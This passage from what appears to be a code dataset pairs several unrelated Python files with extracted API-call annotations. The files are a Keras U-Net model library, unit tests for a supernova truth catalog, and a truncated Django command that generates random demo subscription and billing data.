(['(True)'], {}), '(True)\n', (893, 899), True, 'import FWCore.ParameterSet.Config as cms\n'), ((970, 992), 'FWCore.ParameterSet.Config.untracked.int32', 'cms.untracked.int32', (['(0)'], {}), '(0)\n', (989, 992), True, 'import FWCore.ParameterSet.Config as cms\n')] |
"""
Authors: <NAME>, <NAME>
E-mail: <EMAIL>, <EMAIL>
Course: Mashinski vid, FEEIT, Spring 2021
Date: 09.03.2021
Description: function library
model operations: construction, loading, saving
Python version: 3.6
"""
# python imports
from keras.layers import Conv2D, Conv2DTranspose, MaxPool2D, UpSampling2D, Input, Concatenate
from keras.models import Model, model_from_json
def load_model(model_path, weights_path):
"""
loads a pre-trained model configuration and calculated weights
:param model_path: path of the serialized model configuration file (.json) [string]
:param weights_path: path of the serialized model weights file (.h5) [string]
:return: model - keras model object
"""
# --- load model configuration ---
json_file = open(model_path, 'r')
model_json = json_file.read()
json_file.close()
model = model_from_json(model_json) # load model architecture
model.load_weights(weights_path) # load weights
return model
def construct_model_unet_orig(input_shape):
"""
construct semantic segmentation model architecture (encoder-decoder)
:param input_shape: list of input dimensions (height, width, depth) [tuple]
:return: model - Keras model object
"""
input = Input(shape=input_shape)
# --- encoder ---
conv1 = Conv2D(filters=64, kernel_size=3, activation='relu', padding='same', kernel_initializer='he_normal')(input)
conv11 = Conv2D(filters=64, kernel_size=3, activation='relu', padding='same', kernel_initializer='he_normal')(conv1)
pool1 = MaxPool2D(pool_size=(2, 2))(conv11)
conv2 = Conv2D(filters=128, kernel_size=3, activation='relu', padding='same', kernel_initializer='he_normal')(pool1)
conv22 = Conv2D(filters=128, kernel_size=3, activation='relu', padding='same', kernel_initializer='he_normal')(conv2)
pool2 = MaxPool2D(pool_size=(2, 2))(conv22)
conv3 = Conv2D(filters=256, kernel_size=3, activation='relu', padding='same', kernel_initializer='he_normal')(pool2)
conv33 = Conv2D(filters=256, kernel_size=3, activation='relu', padding='same', kernel_initializer='he_normal')(conv3)
pool3 = MaxPool2D(pool_size=(2, 2))(conv33)
conv4 = Conv2D(filters=512, kernel_size=3, activation='relu', padding='same', kernel_initializer='he_normal')(pool3)
conv44 = Conv2D(filters=512, kernel_size=3, activation='relu', padding='same', kernel_initializer='he_normal')(conv4)
pool4 = MaxPool2D(pool_size=(2, 2))(conv44)
# --- decoder ---
conv5 = Conv2D(filters=1024, kernel_size=3, activation='relu', padding='same', kernel_initializer='he_normal')(pool4)
conv55 = Conv2D(filters=512, kernel_size=3, activation='relu', padding='same', kernel_initializer='he_normal')(conv5)
up1 = UpSampling2D(size=(2, 2))(conv55)
merge1 = Concatenate(axis=3)([conv44, up1])
deconv1 = Conv2DTranspose(filters=512, kernel_size=3, activation='relu', padding='same', kernel_initializer='he_normal')(merge1)
deconv11 = Conv2DTranspose(filters=256, kernel_size=3, activation='relu', padding='same', kernel_initializer='he_normal')(deconv1)
up2 = UpSampling2D(size=(2, 2))(deconv11)
merge2 = Concatenate(axis=3)([conv33, up2])
deconv2 = Conv2DTranspose(filters=256, kernel_size=3, activation='relu', padding='same', kernel_initializer='he_normal')(merge2)
deconv22 = Conv2DTranspose(filters=128, kernel_size=3, activation='relu', padding='same', kernel_initializer='he_normal')(deconv2)
up3 = UpSampling2D(size=(2, 2))(deconv22)
merge3 = Concatenate(axis=3)([conv22, up3])
deconv3 = Conv2DTranspose(filters=128, kernel_size=3, activation='relu', padding='same', kernel_initializer='he_normal')(merge3)
deconv33 = Conv2DTranspose(filters=64, kernel_size=3, activation='relu', padding='same', kernel_initializer='he_normal')(deconv3)
up4 = UpSampling2D(size=(2, 2))(deconv33)
merge4 = Concatenate(axis=3)([conv11, up4])
deconv4 = Conv2DTranspose(filters=64, kernel_size=3, activation='relu', padding='same', kernel_initializer='he_normal')(merge4)
deconv44 = Conv2DTranspose(filters=64, kernel_size=3, activation='relu', padding='same', kernel_initializer='he_normal')(deconv4)
output = Conv2DTranspose(filters=input_shape[2], kernel_size=1, padding='same', activation='sigmoid')(deconv44)
model = Model(input=input, output=output)
return model
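# Illustrative usage (the input shape is an assumption, not from the original
# script): the spatial dimensions must be divisible by 16 because the encoder
# downsamples four times.
# model = construct_model_unet_orig((256, 256, 3))
# model.summary()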
| [
"keras.layers.Conv2D",
"keras.layers.UpSampling2D",
"keras.layers.Concatenate",
"keras.models.model_from_json",
"keras.layers.Input",
"keras.models.Model",
"keras.layers.Conv2DTranspose",
"keras.layers.MaxPool2D"
]
| [((871, 898), 'keras.models.model_from_json', 'model_from_json', (['model_json'], {}), '(model_json)\n', (886, 898), False, 'from keras.models import Model, model_from_json\n'), ((1273, 1297), 'keras.layers.Input', 'Input', ([], {'shape': 'input_shape'}), '(shape=input_shape)\n', (1278, 1297), False, 'from keras.layers import Conv2D, Conv2DTranspose, MaxPool2D, UpSampling2D, Input, Concatenate\n'), ((4332, 4365), 'keras.models.Model', 'Model', ([], {'input': 'input', 'output': 'output'}), '(input=input, output=output)\n', (4337, 4365), False, 'from keras.models import Model, model_from_json\n'), ((1334, 1438), 'keras.layers.Conv2D', 'Conv2D', ([], {'filters': '(64)', 'kernel_size': '(3)', 'activation': '"""relu"""', 'padding': '"""same"""', 'kernel_initializer': '"""he_normal"""'}), "(filters=64, kernel_size=3, activation='relu', padding='same',\n kernel_initializer='he_normal')\n", (1340, 1438), False, 'from keras.layers import Conv2D, Conv2DTranspose, MaxPool2D, UpSampling2D, Input, Concatenate\n'), ((1455, 1559), 'keras.layers.Conv2D', 'Conv2D', ([], {'filters': '(64)', 'kernel_size': '(3)', 'activation': '"""relu"""', 'padding': '"""same"""', 'kernel_initializer': '"""he_normal"""'}), "(filters=64, kernel_size=3, activation='relu', padding='same',\n kernel_initializer='he_normal')\n", (1461, 1559), False, 'from keras.layers import Conv2D, Conv2DTranspose, MaxPool2D, UpSampling2D, Input, Concatenate\n'), ((1575, 1602), 'keras.layers.MaxPool2D', 'MaxPool2D', ([], {'pool_size': '(2, 2)'}), '(pool_size=(2, 2))\n', (1584, 1602), False, 'from keras.layers import Conv2D, Conv2DTranspose, MaxPool2D, UpSampling2D, Input, Concatenate\n'), ((1624, 1729), 'keras.layers.Conv2D', 'Conv2D', ([], {'filters': '(128)', 'kernel_size': '(3)', 'activation': '"""relu"""', 'padding': '"""same"""', 'kernel_initializer': '"""he_normal"""'}), "(filters=128, kernel_size=3, activation='relu', padding='same',\n kernel_initializer='he_normal')\n", (1630, 1729), False, 'from keras.layers import Conv2D, Conv2DTranspose, MaxPool2D, UpSampling2D, Input, Concatenate\n'), ((1746, 1851), 'keras.layers.Conv2D', 'Conv2D', ([], {'filters': '(128)', 'kernel_size': '(3)', 'activation': '"""relu"""', 'padding': '"""same"""', 'kernel_initializer': '"""he_normal"""'}), "(filters=128, kernel_size=3, activation='relu', padding='same',\n kernel_initializer='he_normal')\n", (1752, 1851), False, 'from keras.layers import Conv2D, Conv2DTranspose, MaxPool2D, UpSampling2D, Input, Concatenate\n'), ((1867, 1894), 'keras.layers.MaxPool2D', 'MaxPool2D', ([], {'pool_size': '(2, 2)'}), '(pool_size=(2, 2))\n', (1876, 1894), False, 'from keras.layers import Conv2D, Conv2DTranspose, MaxPool2D, UpSampling2D, Input, Concatenate\n'), ((1916, 2021), 'keras.layers.Conv2D', 'Conv2D', ([], {'filters': '(256)', 'kernel_size': '(3)', 'activation': '"""relu"""', 'padding': '"""same"""', 'kernel_initializer': '"""he_normal"""'}), "(filters=256, kernel_size=3, activation='relu', padding='same',\n kernel_initializer='he_normal')\n", (1922, 2021), False, 'from keras.layers import Conv2D, Conv2DTranspose, MaxPool2D, UpSampling2D, Input, Concatenate\n'), ((2038, 2143), 'keras.layers.Conv2D', 'Conv2D', ([], {'filters': '(256)', 'kernel_size': '(3)', 'activation': '"""relu"""', 'padding': '"""same"""', 'kernel_initializer': '"""he_normal"""'}), "(filters=256, kernel_size=3, activation='relu', padding='same',\n kernel_initializer='he_normal')\n", (2044, 2143), False, 'from keras.layers import Conv2D, Conv2DTranspose, MaxPool2D, UpSampling2D, Input, 
Concatenate\n'), ((2159, 2186), 'keras.layers.MaxPool2D', 'MaxPool2D', ([], {'pool_size': '(2, 2)'}), '(pool_size=(2, 2))\n', (2168, 2186), False, 'from keras.layers import Conv2D, Conv2DTranspose, MaxPool2D, UpSampling2D, Input, Concatenate\n'), ((2208, 2313), 'keras.layers.Conv2D', 'Conv2D', ([], {'filters': '(512)', 'kernel_size': '(3)', 'activation': '"""relu"""', 'padding': '"""same"""', 'kernel_initializer': '"""he_normal"""'}), "(filters=512, kernel_size=3, activation='relu', padding='same',\n kernel_initializer='he_normal')\n", (2214, 2313), False, 'from keras.layers import Conv2D, Conv2DTranspose, MaxPool2D, UpSampling2D, Input, Concatenate\n'), ((2330, 2435), 'keras.layers.Conv2D', 'Conv2D', ([], {'filters': '(512)', 'kernel_size': '(3)', 'activation': '"""relu"""', 'padding': '"""same"""', 'kernel_initializer': '"""he_normal"""'}), "(filters=512, kernel_size=3, activation='relu', padding='same',\n kernel_initializer='he_normal')\n", (2336, 2435), False, 'from keras.layers import Conv2D, Conv2DTranspose, MaxPool2D, UpSampling2D, Input, Concatenate\n'), ((2451, 2478), 'keras.layers.MaxPool2D', 'MaxPool2D', ([], {'pool_size': '(2, 2)'}), '(pool_size=(2, 2))\n', (2460, 2478), False, 'from keras.layers import Conv2D, Conv2DTranspose, MaxPool2D, UpSampling2D, Input, Concatenate\n'), ((2523, 2629), 'keras.layers.Conv2D', 'Conv2D', ([], {'filters': '(1024)', 'kernel_size': '(3)', 'activation': '"""relu"""', 'padding': '"""same"""', 'kernel_initializer': '"""he_normal"""'}), "(filters=1024, kernel_size=3, activation='relu', padding='same',\n kernel_initializer='he_normal')\n", (2529, 2629), False, 'from keras.layers import Conv2D, Conv2DTranspose, MaxPool2D, UpSampling2D, Input, Concatenate\n'), ((2646, 2751), 'keras.layers.Conv2D', 'Conv2D', ([], {'filters': '(512)', 'kernel_size': '(3)', 'activation': '"""relu"""', 'padding': '"""same"""', 'kernel_initializer': '"""he_normal"""'}), "(filters=512, kernel_size=3, activation='relu', padding='same',\n kernel_initializer='he_normal')\n", (2652, 2751), False, 'from keras.layers import Conv2D, Conv2DTranspose, MaxPool2D, UpSampling2D, Input, Concatenate\n'), ((2766, 2791), 'keras.layers.UpSampling2D', 'UpSampling2D', ([], {'size': '(2, 2)'}), '(size=(2, 2))\n', (2778, 2791), False, 'from keras.layers import Conv2D, Conv2DTranspose, MaxPool2D, UpSampling2D, Input, Concatenate\n'), ((2813, 2832), 'keras.layers.Concatenate', 'Concatenate', ([], {'axis': '(3)'}), '(axis=3)\n', (2824, 2832), False, 'from keras.layers import Conv2D, Conv2DTranspose, MaxPool2D, UpSampling2D, Input, Concatenate\n'), ((2862, 2977), 'keras.layers.Conv2DTranspose', 'Conv2DTranspose', ([], {'filters': '(512)', 'kernel_size': '(3)', 'activation': '"""relu"""', 'padding': '"""same"""', 'kernel_initializer': '"""he_normal"""'}), "(filters=512, kernel_size=3, activation='relu', padding=\n 'same', kernel_initializer='he_normal')\n", (2877, 2977), False, 'from keras.layers import Conv2D, Conv2DTranspose, MaxPool2D, UpSampling2D, Input, Concatenate\n'), ((2996, 3111), 'keras.layers.Conv2DTranspose', 'Conv2DTranspose', ([], {'filters': '(256)', 'kernel_size': '(3)', 'activation': '"""relu"""', 'padding': '"""same"""', 'kernel_initializer': '"""he_normal"""'}), "(filters=256, kernel_size=3, activation='relu', padding=\n 'same', kernel_initializer='he_normal')\n", (3011, 3111), False, 'from keras.layers import Conv2D, Conv2DTranspose, MaxPool2D, UpSampling2D, Input, Concatenate\n'), ((3127, 3152), 'keras.layers.UpSampling2D', 'UpSampling2D', ([], {'size': '(2, 2)'}), '(size=(2, 
2))\n', (3139, 3152), False, 'from keras.layers import Conv2D, Conv2DTranspose, MaxPool2D, UpSampling2D, Input, Concatenate\n'), ((3176, 3195), 'keras.layers.Concatenate', 'Concatenate', ([], {'axis': '(3)'}), '(axis=3)\n', (3187, 3195), False, 'from keras.layers import Conv2D, Conv2DTranspose, MaxPool2D, UpSampling2D, Input, Concatenate\n'), ((3225, 3340), 'keras.layers.Conv2DTranspose', 'Conv2DTranspose', ([], {'filters': '(256)', 'kernel_size': '(3)', 'activation': '"""relu"""', 'padding': '"""same"""', 'kernel_initializer': '"""he_normal"""'}), "(filters=256, kernel_size=3, activation='relu', padding=\n 'same', kernel_initializer='he_normal')\n", (3240, 3340), False, 'from keras.layers import Conv2D, Conv2DTranspose, MaxPool2D, UpSampling2D, Input, Concatenate\n'), ((3359, 3474), 'keras.layers.Conv2DTranspose', 'Conv2DTranspose', ([], {'filters': '(128)', 'kernel_size': '(3)', 'activation': '"""relu"""', 'padding': '"""same"""', 'kernel_initializer': '"""he_normal"""'}), "(filters=128, kernel_size=3, activation='relu', padding=\n 'same', kernel_initializer='he_normal')\n", (3374, 3474), False, 'from keras.layers import Conv2D, Conv2DTranspose, MaxPool2D, UpSampling2D, Input, Concatenate\n'), ((3490, 3515), 'keras.layers.UpSampling2D', 'UpSampling2D', ([], {'size': '(2, 2)'}), '(size=(2, 2))\n', (3502, 3515), False, 'from keras.layers import Conv2D, Conv2DTranspose, MaxPool2D, UpSampling2D, Input, Concatenate\n'), ((3539, 3558), 'keras.layers.Concatenate', 'Concatenate', ([], {'axis': '(3)'}), '(axis=3)\n', (3550, 3558), False, 'from keras.layers import Conv2D, Conv2DTranspose, MaxPool2D, UpSampling2D, Input, Concatenate\n'), ((3588, 3703), 'keras.layers.Conv2DTranspose', 'Conv2DTranspose', ([], {'filters': '(128)', 'kernel_size': '(3)', 'activation': '"""relu"""', 'padding': '"""same"""', 'kernel_initializer': '"""he_normal"""'}), "(filters=128, kernel_size=3, activation='relu', padding=\n 'same', kernel_initializer='he_normal')\n", (3603, 3703), False, 'from keras.layers import Conv2D, Conv2DTranspose, MaxPool2D, UpSampling2D, Input, Concatenate\n'), ((3722, 3836), 'keras.layers.Conv2DTranspose', 'Conv2DTranspose', ([], {'filters': '(64)', 'kernel_size': '(3)', 'activation': '"""relu"""', 'padding': '"""same"""', 'kernel_initializer': '"""he_normal"""'}), "(filters=64, kernel_size=3, activation='relu', padding=\n 'same', kernel_initializer='he_normal')\n", (3737, 3836), False, 'from keras.layers import Conv2D, Conv2DTranspose, MaxPool2D, UpSampling2D, Input, Concatenate\n'), ((3852, 3877), 'keras.layers.UpSampling2D', 'UpSampling2D', ([], {'size': '(2, 2)'}), '(size=(2, 2))\n', (3864, 3877), False, 'from keras.layers import Conv2D, Conv2DTranspose, MaxPool2D, UpSampling2D, Input, Concatenate\n'), ((3901, 3920), 'keras.layers.Concatenate', 'Concatenate', ([], {'axis': '(3)'}), '(axis=3)\n', (3912, 3920), False, 'from keras.layers import Conv2D, Conv2DTranspose, MaxPool2D, UpSampling2D, Input, Concatenate\n'), ((3950, 4064), 'keras.layers.Conv2DTranspose', 'Conv2DTranspose', ([], {'filters': '(64)', 'kernel_size': '(3)', 'activation': '"""relu"""', 'padding': '"""same"""', 'kernel_initializer': '"""he_normal"""'}), "(filters=64, kernel_size=3, activation='relu', padding=\n 'same', kernel_initializer='he_normal')\n", (3965, 4064), False, 'from keras.layers import Conv2D, Conv2DTranspose, MaxPool2D, UpSampling2D, Input, Concatenate\n'), ((4083, 4197), 'keras.layers.Conv2DTranspose', 'Conv2DTranspose', ([], {'filters': '(64)', 'kernel_size': '(3)', 'activation': '"""relu"""', 'padding': 
'"""same"""', 'kernel_initializer': '"""he_normal"""'}), "(filters=64, kernel_size=3, activation='relu', padding=\n 'same', kernel_initializer='he_normal')\n", (4098, 4197), False, 'from keras.layers import Conv2D, Conv2DTranspose, MaxPool2D, UpSampling2D, Input, Concatenate\n'), ((4216, 4312), 'keras.layers.Conv2DTranspose', 'Conv2DTranspose', ([], {'filters': 'input_shape[2]', 'kernel_size': '(1)', 'padding': '"""same"""', 'activation': '"""sigmoid"""'}), "(filters=input_shape[2], kernel_size=1, padding='same',\n activation='sigmoid')\n", (4231, 4312), False, 'from keras.layers import Conv2D, Conv2DTranspose, MaxPool2D, UpSampling2D, Input, Concatenate\n')] |
"""
Unit tests for SNIa truth catalog code.
"""
import os
import unittest
import sqlite3
import numpy as np
import pandas as pd
from desc.sims_truthcatalog import SNeTruthWriter, SNSynthPhotFactory
class SNSynthPhotFactoryTestCase(unittest.TestCase):
"""
Test case class for SNIa synthetic photometry factory class.
"""
    def test_SNSynthPhotFactory(self):
"""
Test some flux calculations using the underlying SNObject
and SyntheticPhotometry classes.
"""
sp_factory = SNSynthPhotFactory(z=0.6322702169418335,
t0=61719.9950436545,
x0=4.2832710977804034e-06,
x1=-1.207738485943195,
c=-0.0069750402968899936,
snra=55.26407314527358,
sndec=-40.81575605788344)
mjds = (61689.150791, 61697.354470, 61712.258685)
bands = ('z', 'i', 'r')
fluxes = (2.6401569864737633, 71.18561504923377, 1048.0327802379868)
for mjd, band, flux in zip(mjds, bands, fluxes):
sp = sp_factory.create(mjd)
self.assertAlmostEqual(sp.calcFlux(band), flux)
class SNeTruthWriterTestCase(unittest.TestCase):
"""
Test case class for SNIa truth catalog generation class.
"""
def setUp(self):
self.outfile = 'test_sne_truth_cat.db'
self.data_dir = os.path.join(os.environ['SIMS_TRUTHCATALOG_DIR'],
'data')
sn_db_file = os.path.join(self.data_dir,
'sne_cosmoDC2_v1.1.4_MS_DDF_small.db')
self.sne_truth_writer = SNeTruthWriter(self.outfile, sn_db_file)
def tearDown(self):
if os.path.isfile(self.outfile):
os.remove(self.outfile)
def test_truth_summary(self):
"""Test that the truth_summary columns are filled out as expected."""
self.sne_truth_writer.write()
with sqlite3.connect(self.outfile) as conn:
df = pd.read_sql('select * from truth_summary', conn)
zeros = np.zeros(len(df))
ones = np.ones(len(df))
np.testing.assert_equal(df['is_variable'], ones)
np.testing.assert_equal(df['is_pointsource'], ones)
for band in 'ugrizy':
flux_col = f'flux_{band}'
np.testing.assert_equal(df[flux_col], zeros)
flux_col += '_noMW'
np.testing.assert_equal(df[flux_col], zeros)
def test_auxiliary_truth(self):
"""
Test that the columns from the sne_params table are transcribed
correctly.
"""
self.sne_truth_writer.write_auxiliary_truth()
with sqlite3.connect(self.outfile) as conn:
df = pd.read_sql('select * from sn_auxiliary_info', conn)
np.testing.assert_equal(self.sne_truth_writer.sne_df['snid_in'],
df['id'].to_numpy())
np.testing.assert_equal(self.sne_truth_writer.sne_df['galaxy_id'],
df['host_galaxy'].to_numpy())
np.testing.assert_equal(self.sne_truth_writer.sne_df['snra_in'],
df['ra'].to_numpy())
np.testing.assert_equal(self.sne_truth_writer.sne_df['t0_in'],
df['t0'].to_numpy())
np.testing.assert_equal(self.sne_truth_writer.sne_df['z_in'],
df['redshift'].to_numpy())
def test_variability_truth(self):
"""
Test some expected values for a SNIa in the test SNe catalog
using a small opsim db table.
"""
opsim_db_file = os.path.join(self.data_dir,
'minion_1016_desc_dithered_v4_small.db')
self.sne_truth_writer.write_variability_truth(opsim_db_file,
max_rows=60)
with sqlite3.connect(self.outfile) as conn:
df = pd.read_sql('select * from sn_variability_truth', conn)
my_object = 'MS_10195_1375'
self.assertIn(my_object, df['id'].to_list())
my_df = df.query(f'id == "{my_object}"')
for visit in (1425850, 1433860, 1495410):
self.assertIn(visit, my_df['obsHistID'].to_list())
if __name__ == '__main__':
unittest.main()
| [
"numpy.testing.assert_equal",
"sqlite3.connect",
"desc.sims_truthcatalog.SNSynthPhotFactory",
"os.path.join",
"os.path.isfile",
"unittest.main",
"pandas.read_sql",
"desc.sims_truthcatalog.SNeTruthWriter",
"os.remove"
]
| [((4369, 4384), 'unittest.main', 'unittest.main', ([], {}), '()\n', (4382, 4384), False, 'import unittest\n'), ((524, 720), 'desc.sims_truthcatalog.SNSynthPhotFactory', 'SNSynthPhotFactory', ([], {'z': '(0.6322702169418335)', 't0': '(61719.9950436545)', 'x0': '(4.2832710977804034e-06)', 'x1': '(-1.207738485943195)', 'c': '(-0.0069750402968899936)', 'snra': '(55.26407314527358)', 'sndec': '(-40.81575605788344)'}), '(z=0.6322702169418335, t0=61719.9950436545, x0=\n 4.2832710977804034e-06, x1=-1.207738485943195, c=-0.0069750402968899936,\n snra=55.26407314527358, sndec=-40.81575605788344)\n', (542, 720), False, 'from desc.sims_truthcatalog import SNeTruthWriter, SNSynthPhotFactory\n'), ((1496, 1553), 'os.path.join', 'os.path.join', (["os.environ['SIMS_TRUTHCATALOG_DIR']", '"""data"""'], {}), "(os.environ['SIMS_TRUTHCATALOG_DIR'], 'data')\n", (1508, 1553), False, 'import os\n'), ((1612, 1678), 'os.path.join', 'os.path.join', (['self.data_dir', '"""sne_cosmoDC2_v1.1.4_MS_DDF_small.db"""'], {}), "(self.data_dir, 'sne_cosmoDC2_v1.1.4_MS_DDF_small.db')\n", (1624, 1678), False, 'import os\n'), ((1745, 1785), 'desc.sims_truthcatalog.SNeTruthWriter', 'SNeTruthWriter', (['self.outfile', 'sn_db_file'], {}), '(self.outfile, sn_db_file)\n', (1759, 1785), False, 'from desc.sims_truthcatalog import SNeTruthWriter, SNSynthPhotFactory\n'), ((1822, 1850), 'os.path.isfile', 'os.path.isfile', (['self.outfile'], {}), '(self.outfile)\n', (1836, 1850), False, 'import os\n'), ((2231, 2279), 'numpy.testing.assert_equal', 'np.testing.assert_equal', (["df['is_variable']", 'ones'], {}), "(df['is_variable'], ones)\n", (2254, 2279), True, 'import numpy as np\n'), ((2288, 2339), 'numpy.testing.assert_equal', 'np.testing.assert_equal', (["df['is_pointsource']", 'ones'], {}), "(df['is_pointsource'], ones)\n", (2311, 2339), True, 'import numpy as np\n'), ((3718, 3786), 'os.path.join', 'os.path.join', (['self.data_dir', '"""minion_1016_desc_dithered_v4_small.db"""'], {}), "(self.data_dir, 'minion_1016_desc_dithered_v4_small.db')\n", (3730, 3786), False, 'import os\n'), ((1864, 1887), 'os.remove', 'os.remove', (['self.outfile'], {}), '(self.outfile)\n', (1873, 1887), False, 'import os\n'), ((2052, 2081), 'sqlite3.connect', 'sqlite3.connect', (['self.outfile'], {}), '(self.outfile)\n', (2067, 2081), False, 'import sqlite3\n'), ((2108, 2156), 'pandas.read_sql', 'pd.read_sql', (['"""select * from truth_summary"""', 'conn'], {}), "('select * from truth_summary', conn)\n", (2119, 2156), True, 'import pandas as pd\n'), ((2420, 2464), 'numpy.testing.assert_equal', 'np.testing.assert_equal', (['df[flux_col]', 'zeros'], {}), '(df[flux_col], zeros)\n', (2443, 2464), True, 'import numpy as np\n'), ((2509, 2553), 'numpy.testing.assert_equal', 'np.testing.assert_equal', (['df[flux_col]', 'zeros'], {}), '(df[flux_col], zeros)\n', (2532, 2553), True, 'import numpy as np\n'), ((2773, 2802), 'sqlite3.connect', 'sqlite3.connect', (['self.outfile'], {}), '(self.outfile)\n', (2788, 2802), False, 'import sqlite3\n'), ((2829, 2881), 'pandas.read_sql', 'pd.read_sql', (['"""select * from sn_auxiliary_info"""', 'conn'], {}), "('select * from sn_auxiliary_info', conn)\n", (2840, 2881), True, 'import pandas as pd\n'), ((3973, 4002), 'sqlite3.connect', 'sqlite3.connect', (['self.outfile'], {}), '(self.outfile)\n', (3988, 4002), False, 'import sqlite3\n'), ((4029, 4084), 'pandas.read_sql', 'pd.read_sql', (['"""select * from sn_variability_truth"""', 'conn'], {}), "('select * from sn_variability_truth', conn)\n", (4040, 4084), True, 'import pandas as 
pd\n')] |
# Copyright (c) 2018, DjaoDjin inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED
# TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;
# OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
# OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF
# ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import datetime, logging, random
from django.conf import settings
from django.core.management.base import BaseCommand
from django.db.utils import IntegrityError
from django.template.defaultfilters import slugify
from django.utils.timezone import utc
from saas.backends.razorpay_processor import RazorpayBackend
from saas.models import Plan, Transaction, get_broker
from saas.utils import datetime_or_now
from saas.settings import PROCESSOR_ID
LOGGER = logging.getLogger(__name__)
class Command(BaseCommand):
"""
Load the database with random transactions (testing purposes).
"""
USE_OF_SERVICE = 0
PAY_BALANCE = 1
REDEEM = 2
REFUND = 3
CHARGEBACK = 4
WRITEOFF = 5
FIRST_NAMES = (
'Anthony',
'Alexander',
'Alexis',
'Alicia',
'Ashley',
'Benjamin',
'Bruce',
'Chloe',
'Christopher',
'Daniel',
'David',
'Edward',
'Emily',
'Emma',
'Ethan',
'Grace',
'Isabella',
'Jacob',
'James',
'Jayden',
'Jennifer',
'John',
'Julia',
'Lily',
'Lucie',
'Luis',
'Matthew',
'Michael',
'Olivia',
'Ryan',
'Samantha',
'Samuel',
'Scott',
'Sophia',
        'William',
)
LAST_NAMES = (
'Smith',
'Johnson',
'Williams',
'Jones',
'Brown',
'Davis',
'Miller',
'Wilson',
'Moore',
'Taylor',
'Anderson',
'Thomas',
'Jackson',
'White',
'Harris',
'Martin',
'Thompson',
'Garcia',
'Martinez',
'Robinson',
'Clark',
        'Rodriguez',
'Lewis',
'Lee',
'Walker',
'Hall',
'Allen',
'Young',
'Hernandez',
'King',
'Wright',
'Lopez',
'Hill',
'Green',
'Baker',
'Gonzalez',
'Nelson',
'Mitchell',
'Perez',
'Roberts',
'Turner',
'Philips',
'Campbell',
'Parker',
'Collins',
'Stewart',
'Sanchez',
'Morris',
'Rogers',
'Reed',
'Cook',
'Bell',
'Cooper',
'Richardson',
'Cox',
'Ward',
'Peterson',
)
def add_arguments(self, parser):
parser.add_argument('--provider',
action='store', dest='provider',
default=settings.SAAS['BROKER']['GET_INSTANCE'],
help='create sample subscribers on this provider')
def handle(self, *args, **options):
#pylint: disable=too-many-locals,too-many-statements
from saas.managers.metrics import month_periods # avoid import loop
from saas.models import (Charge, ChargeItem, Organization, Plan,
Subscription)
RazorpayBackend.bypass_api = True
now = datetime.datetime.utcnow().replace(tzinfo=utc)
from_date = now
from_date = datetime.datetime(
year=from_date.year, month=from_date.month, day=1)
if args:
from_date = datetime.datetime.strptime(
args[0], '%Y-%m-%d')
# Create a set of 3 plans
broker = get_broker()
Plan.objects.get_or_create(
slug='basic',
defaults={
'title': "Basic",
'description': "Basic Plan",
'period_amount': 24900,
'broker_fee_percent': 0,
'period_type': 4,
'advance_discount': 1000,
'organization': broker,
'is_active': True
})
Plan.objects.get_or_create(
slug='medium',
defaults={
'title': "Medium",
'description': "Medium Plan",
'period_amount': 24900,
'broker_fee_percent': 0,
'period_type': 4,
'organization': broker,
'is_active': True
})
Plan.objects.get_or_create(
slug='premium',
defaults={
'title': "Premium",
'description': "Premium Plan",
'period_amount': 18900,
'broker_fee_percent': 0,
'period_type': 4,
'advance_discount': 81,
'organization': broker,
'is_active': True
})
        # Create Income transactions that represent a growing business.
provider = Organization.objects.get(slug=options['provider'])
processor = Organization.objects.get(pk=PROCESSOR_ID)
for end_period in month_periods(from_date=from_date):
nb_new_customers = random.randint(0, 9)
for _ in range(nb_new_customers):
queryset = Plan.objects.filter(
organization=provider, period_amount__gt=0)
plan = queryset[random.randint(0, queryset.count() - 1)]
created = False
trials = 0
while not created:
try:
first_name = self.FIRST_NAMES[random.randint(
0, len(self.FIRST_NAMES)-1)]
last_name = self.LAST_NAMES[random.randint(
0, len(self.LAST_NAMES)-1)]
full_name = '%s %s' % (first_name, last_name)
slug = slugify('demo%d' % random.randint(1, 1000))
customer, created = Organization.objects.get_or_create(
slug=slug, full_name=full_name)
#pylint: disable=catching-non-exception
except IntegrityError:
trials = trials + 1
if trials > 10:
raise RuntimeError(
'impossible to create a new customer after 10 trials.')
Organization.objects.filter(pk=customer.id).update(
created_at=end_period)
subscription = Subscription.objects.create(
organization=customer, plan=plan,
ends_at=now + datetime.timedelta(days=31))
Subscription.objects.filter(
pk=subscription.id).update(created_at=end_period)
# Insert some churn in %
churn_rate = 2
all_subscriptions = Subscription.objects.filter(
plan__organization=provider)
nb_churn_customers = (all_subscriptions.count()
* churn_rate // 100)
subscriptions = random.sample(list(all_subscriptions),
all_subscriptions.count() - nb_churn_customers)
for subscription in subscriptions:
nb_periods = random.randint(1, 6)
transaction_item = Transaction.objects.new_subscription_order(
subscription, nb_natural_periods=nb_periods,
created_at=end_period)
if transaction_item.dest_amount < 50:
continue
transaction_item.orig_amount = transaction_item.dest_amount
transaction_item.orig_unit = transaction_item.dest_unit
transaction_item.save()
charge = Charge.objects.create(
created_at=transaction_item.created_at,
amount=transaction_item.dest_amount,
customer=subscription.organization,
description='Charge for %d periods' % nb_periods,
last4=1241,
exp_date=datetime_or_now(),
processor=processor,
